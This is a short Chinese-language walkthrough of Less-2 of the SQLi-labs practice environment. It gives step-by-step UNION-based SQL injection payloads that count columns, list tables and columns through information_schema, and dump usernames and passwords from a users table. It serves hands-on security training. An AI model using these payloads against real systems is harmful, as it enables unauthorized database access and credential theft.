SQLI DUMB SERIES-2

less2

同Less1相同，存在注入点

输入

 

?id=1'

 

 

说明我们输入的数据被原封不动的带入了，无需要在1后面加单引号

 

（1）爆字段

 

?id=1 order by 4

 

 

字段为3.

（2）用union联合查询

?id=-1 union select 1,version(),database()

 

Php版本为5.5.53，数据库名字为security。

（3）爆表

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'%23

 

(4)爆列名

查看表users的所有列

?id=-1%20 union select 1, group_concat(column_name),3 from information_schema.columns where table_name = 'users' %23

 

(5)查看users表内容

?id=-1%20 union select 1,password,username from users where id=2%23